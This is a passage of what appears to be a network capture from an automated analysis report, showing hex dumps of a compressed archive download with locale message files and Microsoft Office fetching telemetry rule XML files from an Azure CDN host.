2024-11-13 19:39:42 UTC	1378	IN	Data Raw: aa 54 89 36 c1 f8 f2 5a f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48 a3 f3 51 8d bf ec 7b b7 96 fe fb f9 78 de 4f 51 f3 7e 2b 7d bb ff fe 4c d9 39 5f 12 3a 97 2c 45 97 ef ef 0b 13 71 f1 30 26 ce df 1f 49 3b 62 c4 e0 48 bb b1 11 3e ea f2 8e 02 39 b3 7d 09 42 84 80 d8 92 2e 7c e4 41 b8 a9 7c 61 8b 47 e8 1c 82 eb b9 f4 a1 91 6f f7 4f 7b e5 5c 0b 13 d5 85 cf e6 83 09 bb 83 09 54 69 a1 5a 98 fa ba 1b e6 c2 dc 9c 0f db f0 51 98 ce ef f3 fc Data Ascii: T6Z?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjHQ{xOQ~+}L9_:,Eq0&I;bH>9}B.\|A\|aGoO{\TiZQ
2024-11-13 19:39:42 UTC	1378	IN	Data Raw: 88 1b 77 cc 06 18 f9 d1 78 a4 43 22 82 21 af 78 ed e5 3b 17 31 63 f2 12 16 6f 58 13 8a ac 6b 1f 08 96 b6 8e 59 b4 c8 5e 7b ff 95 e3 e3 6c 66 93 48 75 bd 57 d8 44 86 61 51 06 73 e9 21 bf d8 c1 38 0f 10 8e 94 67 c9 ae de 62 0f 6a 0d 08 71 f9 00 01 36 e4 d7 e2 f8 fd 7e ad e7 de 90 39 1c a3 5e 29 61 4c ee 81 a2 7b 44 c7 8e 2a b9 2d 76 d2 4b 76 32 2c a9 88 31 c0 6e d9 6b 8d a6 5a 8f 18 9d a2 60 79 ed cb ff 87 06 97 0d 1e 32 a3 56 32 10 9f b9 a9 d2 c4 8b 46 12 b8 5e dc 88 5e 98 61 86 3b 1d 0a 96 7b 16 9e c8 68 27 de 4a 05 5d 6c ca cd 72 ee c9 b5 fc 47 ed 73 37 d8 17 1e 9a eb 56 7a a1 49 00 ec 50 20 44 6e 0c 07 32 6b 0d f0 31 8f 82 17 33 36 ef 77 16 e0 38 a3 78 57 75 ef f7 45 fe d6 da dc 1b 3c a4 60 9b 5a c3 ab 54 de 7c 84 75 4b 00 a2 d8 aa 43 dd 63 24 a2 05 b3 Data Ascii: wxC"!x;1coXkY^{lfHuWDaQs!8gbjq6~9^)aL{D*-vKv2,1nkZ`y2V2F^^a;{h'J]lrGs7VzIP Dn2k136w8xWuE<`ZT\|uKCc$
2024-11-13 19:39:42 UTC	1378	IN	Data Raw: ec 3c 53 7b bd 2b 0d f6 8f 48 d5 27 4c 9d 21 67 cf 13 d5 fd 28 ef 16 fb ab 5b b1 72 6f 45 f7 8a 4f da b3 e7 94 c8 03 e1 ba 8f ea 98 8d ad 70 5b 75 d3 db 31 31 1e 65 20 3f 73 03 a7 8c c0 5d 02 07 98 cf a2 15 9d ee 3b 96 d8 5b 6e bd d6 e7 1c e9 c6 a6 3c ec 04 df 03 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 1b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 8e cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee b9 e4 ce 81 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 1e cc c8 00 69 9f 41 62 95 20 df bd 2c b1 bf 6b be 5b ba 52 77 ca c0 9b 04 7c b7 44 3b 68 e6 61 cf 76 78 4c 3a 74 24 9e d6 21 da de bf f7 1b 89 3f 5c 33 4b 7c e7 5f 9b f5 e1 23 f2 f7 8f ff 83 bf 91 02 97 ae 8d 7f 06 9c bd 4c 5d 83 7b e3 6b 6c 38 41 a1 10 8f 67 d6 26 30 9e 29 6c 6d ce c7 a7 68 e7 66 Data Ascii: <S{+H'L!g([roEOp[u11e ?s];[n<jOpD1j=h&U?%h@Q6PlNf"wiAb ,k[Rw\|D;havxL:t$!?\3K\|_#L]{kl8Ag&0)lmhf
2024-11-13 19:39:42 UTC	1378	IN	Data Raw: 73 be d1 73 8f fe f4 bd 21 33 d5 4d 7a 30 92 e6 a0 73 01 69 4f 6c e7 64 e7 06 c4 1f cd ca 43 29 99 d5 a9 e4 d2 27 1d 24 47 c6 70 b9 db 83 b8 ff e3 7b 43 fd 1c bd 60 8e 2a b8 9e 3b 74 be 19 0c 65 10 ff b7 71 9b 03 75 c2 bc 05 66 42 30 d4 bd 44 4c 1f e0 98 f8 e0 5e 51 d6 09 16 ee 62 8a 41 64 da 7a 3d 5a 33 a2 f1 1d 19 2a c9 80 f3 07 8d 29 4d f6 90 9d 6a f4 d8 56 61 85 9f 3a ce 4e 59 a7 6e a9 e5 ea 31 ff db f8 7b 43 fb aa 2b b5 c2 4c a8 10 57 3e 9d 12 73 e0 51 5f ef a3 40 64 48 ab 09 6b 6a 14 35 a1 2f 83 cb 26 d1 e4 cb 9d b8 cb 6e d2 3d 1d 90 fa 7e 9d 1e 6b cc d2 f8 7b 2e c6 37 f3 df 63 e9 ba ef fe 7d de f2 f4 a7 e7 2c 7f fb ee 20 7d 36 a6 a6 6a 7f 3b 2b 59 eb 18 b5 6f b9 8e 0b c1 c7 7b c1 1d 95 99 f6 ad e8 d4 b5 e8 6c ed 3f a7 af c2 af 3f 73 bf 3d ff ef 77 Data Ascii: ss!3Mz0siOldC)'$Gp{C`;tequfB0DL^QbAdz=Z3)MjVa:NYn1{C+LW>sQ_@dHkj5/&n=~k{.7c}, }6j;+Yo{l??s=w
2024-11-13 19:39:42 UTC	1378	IN	Data Raw: 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 76 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 3d 6f dc 30 0c dd fb 2b 08 cf 46 70 fd 1c b2 05 08 d0 a1 45 53 a4 59 02 64 61 4e b4 23 48 a6 04 8a 72 72 08 f2 df 4b 9d 7d 08 ce e8 d0 45 03 45 be f7 f8 1e 5f bb bd 10 2a 31 3d 77 97 af dd 44 a5 e0 48 dd 65 f7 e7 c7 d5 ef 2b f8 75 7f 77 d7 bd f5 1d bd e4 88 8c ea 13 a7 61 88 9e c9 f9 82 8f 91 dc f9 d4 75 85 87 ba db d1 17 81 b5 ef 02 6e 26 70 15 66 1f 23 20 cf cb 37 3b 84 ef 29 8d 91 e0 3a 85 3a 11 2b 54 45 06 cf 4a c2 a4 35 e7 90 72 36 84 b1 3f 42 0e df 72 66 Data Ascii: !-_locales/sv/messages.jsonUTPf R=o0+FpESYdaN#HrrK}EE_*1=wDHe+uwaun&pf# 7;)::+TEJ5r6?Brf
2024-11-13 19:39:42 UTC	1378	IN	Data Raw: d6 92 10 e8 84 d6 9a 4c 28 b9 28 68 15 81 3d 3a d0 47 7f 87 f5 aa c5 a0 2c 48 96 b4 9f 93 24 bf 74 ca 3b a4 a0 f9 6a e6 a1 cc 40 81 91 19 30 5d a1 39 7e 39 01 48 39 a0 4f 22 d8 2a e1 e0 08 be e7 cf 6d 6c b8 0b be c9 03 07 28 7d 6a dc e2 3f 42 98 78 2d d6 a1 b1 19 12 f8 68 b4 04 85 9d 97 35 1c 1b 0c 16 5f 55 b4 c5 fe ea 43 28 83 0e 40 08 bf 0d 79 16 7a c3 cf 26 b0 46 00 0e 4b 9e 50 f8 ed 3b 0e 8c 5d 3c 0b 64 ca 72 2e 90 41 1f b1 d4 e7 ed 22 33 dd 46 8d 4d 1a 99 c7 e4 99 3c 21 86 b1 e4 d2 54 27 cf df ef 91 4e 01 0d 30 81 96 55 96 37 4e 3d d0 01 5c b2 ca 55 80 04 ec aa e2 2a 73 90 6b ac 51 58 5b 6a 0a 34 8b b4 b7 4f b0 0d b9 c6 2c a1 85 38 3d c9 71 2f 07 ef 6d df 60 8f b9 82 8c 87 80 43 e8 d4 88 fe 62 9f b4 94 b9 d7 66 ac 7c 82 88 1d 51 d1 f9 61 37 fe 39 d8 Data Ascii: L((h=:G,H$t;j@0]9~9H9O"ml(}j?Bx-h5_UC(@yz&FKP;]<dr.A"3FM<!T'N0U7N=\UskQX[j4O,8=q/m`Cbf\|Qa79
2024-11-13 19:39:42 UTC	1378	IN	Data Raw: ad c4 ca 60 aa 12 70 5b 7b 7a c3 30 ec 7c ed 63 70 f3 2d c2 2b 61 1b 8f d7 00 1b e0 cd 2b ef 78 f7 a3 67 c0 39 32 a9 1f 80 6c 66 17 97 d6 80 80 69 32 ab bf c3 f0 d2 d1 02 c6 d1 d1 ca 7f 28 f3 d3 05 cf d7 e6 67 96 67 73 39 3b dd 9e 5f c5 2e 08 52 5b 60 e6 23 e4 24 80 17 de cf 8c 32 61 22 26 18 40 81 51 37 1a 3d e4 69 36 45 18 6c 38 96 b1 f8 bc 04 25 63 8c 69 6f 0b 8e 93 22 11 da 2b e2 2e dd 3c 66 df 7d 3c c4 05 36 71 e2 c9 b8 a6 7e 66 b3 9b 73 21 3a a7 95 67 38 d4 83 89 c3 d7 91 64 de c5 5b 01 f5 ff a5 13 58 78 d8 a8 54 25 22 24 d8 16 40 cd 81 70 5e c5 3b d8 dd 55 72 b8 9e d6 48 15 06 41 57 68 5b e8 27 30 b1 82 0f e8 09 d8 f8 24 0d ae 73 05 91 20 6f 32 84 0d f0 82 95 ca 25 80 50 f5 46 fa 49 1e 46 5e 38 4e d2 28 ef db ce 9f 18 54 a7 c3 53 4b c7 26 a2 ba e4 Data Ascii: `p[{z0\|cp-+a+xg92lfi2(ggs9;_.R[`#$2a"&@Q7=i6El8%cio"+.<f}<6q~fs!:g8d[XxT%"$@p^;UrHAWh['0$s o2%PFIF^8N(TSK&
2024-11-13 19:39:42 UTC	1378	IN	Data Raw: 58 0d 04 41 31 f1 f1 a8 15 a1 54 1e 5a 8d 72 3d e2 47 40 31 01 b6 e2 e3 20 ba 53 87 b9 64 39 96 a9 1f 50 8d c3 df 89 4f 3c 44 83 14 ce e2 33 f3 a3 46 d1 e2 45 58 a7 2c f7 48 0a 04 81 50 14 d0 11 86 4d 66 e7 ff be d5 aa ce 18 47 ec d9 2c f8 22 13 e5 35 27 b7 b0 97 2a bf 2c 0b d7 07 48 d7 30 c9 86 93 1f b0 17 3e b8 b1 bc a7 01 17 51 9c 66 55 50 9a b0 bb 80 25 f5 6f 33 e1 cf d4 9d 1c 93 ba 54 72 a7 e2 f6 75 97 90 fe 6f d2 46 10 67 11 75 4c 7e d0 94 af e3 4d 5d b4 38 17 ad 83 c4 09 26 df 24 fb 10 6d 5d e5 56 f8 11 0d 2d bb f3 2c 35 9d 43 aa d3 dc cc 21 ae 95 db 49 63 90 e8 bb b5 a2 31 68 28 4f c1 46 84 c4 ae 85 65 77 6e 1d 5c 72 28 c5 cb d9 9f 0c 82 36 6a 85 c3 0c cb 86 67 50 98 fd a8 5e 6f c5 03 8b 54 f3 c2 30 f0 94 72 6d 96 45 e2 75 68 b3 3c 02 83 6b 79 2f Data Ascii: XA1TZr=G@1 Sd9PO<D3FEX,HPMfG,"5'*,H0>QfUP%o3TruoFguL~M]8&$m]V-,5C!Ic1h(OFewn\r(6jgP^oT0rmEuh<ky/
2024-11-13 19:39:42 UTC	1378	IN	Data Raw: 14 0d 73 e2 64 7e de 02 18 e4 0f c3 f4 76 5f 5c be dd ce 6f 88 69 ac e4 50 fa ee 07 ab c8 a0 8b 52 e9 bb 55 6b fa 9f c6 22 3c 29 b7 da 31 d5 9e ae 5a b0 94 e9 7c 5c e7 66 a1 94 56 e8 81 c0 57 d2 a5 5b 41 6a 0e 92 60 dd 9b c4 c3 77 12 c5 dc 29 96 c5 76 0c 56 10 bf 85 d3 7f df 78 05 8d e2 78 fc 2e d0 e2 68 c5 5e ba e2 78 a2 f7 ae 74 a2 c9 5d 23 c5 a1 dd 77 87 05 87 09 52 cb 31 68 27 3d 4b 9d 65 b2 de 77 fd b1 ff 96 4d 3f 5e 60 b9 1e 38 a4 9e c8 b0 ea d5 db 24 51 55 05 52 b6 f2 27 f0 e4 fd 6c 75 91 a7 7f 43 1e 77 ee c0 54 0b 56 cd 31 4f 5e ee ea 9b de 9a b3 38 11 b7 da d9 f9 e5 0f 50 4b 07 08 fd 45 55 f9 17 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6d 6e 2f 6d 65 Data Ascii: sd~v_\oiPRUk"<)1Z\|\fVW[Aj`w)vVxx.h^xt]#wR1h'=KewM?^`8$QUR'luCwTV1O^8PKEUPK!-_locales/mn/me

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.5	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:42 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:42 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:42 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193942Z-16547b76f7flf9g6hC1DFWmcx8000000082000000000tp9p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:42 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.5	49881	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:42 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:43 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:43 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 0d90a021-001e-00a2-7761-35d4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193943Z-1749fc9bdbd2jxtthC1DFWfk5w00000001fg000000003u5g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:43 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.5	49880	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:42 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:43 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:43 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 8f98044c-301e-006e-14bd-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193943Z-16547b76f7fwvr5dhC1DFW2c940000000hkg000000002ufd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:43 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.5	49882	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:42 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:43 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:43 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: 3018d77d-101e-008d-49d2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193943Z-16547b76f7fcrtpchC1DFW52e80000000hpg000000008vmx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:43 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.5	49883	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:43 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:43 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:43 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: a8f55147-f01e-003f-7fa0-34d19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193943Z-1749fc9bdbdwv5sghC1DFWwp6n000000019000000000khfa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:43 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.5	49888	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:43 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:43 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:43 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: d0aff24d-301e-000c-58d2-2c323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193943Z-16547b76f7fcrtpchC1DFW52e80000000hh000000000xnq2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:43 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.5	49884	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:43 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6e 4c 43 69 43 64 58 39 61 30 6d 6d 35 65 73 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 63 63 30 33 39 30 36 31 62 65 65 34 62 34 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: nLCiCdX9a0mm5esR.1Context: 8cc039061bee4b47
